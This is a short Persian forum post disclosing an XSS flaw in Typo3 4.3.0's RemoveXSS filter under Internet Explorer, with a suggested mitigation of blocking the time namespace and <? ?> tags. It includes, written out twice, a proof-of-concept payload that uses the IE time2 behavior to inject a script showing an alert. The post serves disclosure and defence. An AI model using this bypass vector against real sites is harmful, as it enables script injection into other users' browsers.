Yousha
یک شنبه 06 دی 1388, 17:54 عصر
سلام،
نرم افزار Typo3 نگارش 4.3.0 باگ XSS داره(مرورگر IE)!
این باگ در تابع process در کلاس RemoveXSS داخل فایل RemoveXSS.php قرار داره...
خودتون با بلاک/ممنوع کردن urn:schemas-microsoft-com:time و تگ <? ?> Patch کنیدش.
<xml>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS24")</SCRIPT>">
نرم افزار Typo3 نگارش 4.3.0 باگ XSS داره(مرورگر IE)!
این باگ در تابع process در کلاس RemoveXSS داخل فایل RemoveXSS.php قرار داره...
خودتون با بلاک/ممنوع کردن urn:schemas-microsoft-com:time و تگ <? ?> Patch کنیدش.
<xml>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS24")</SCRIPT>">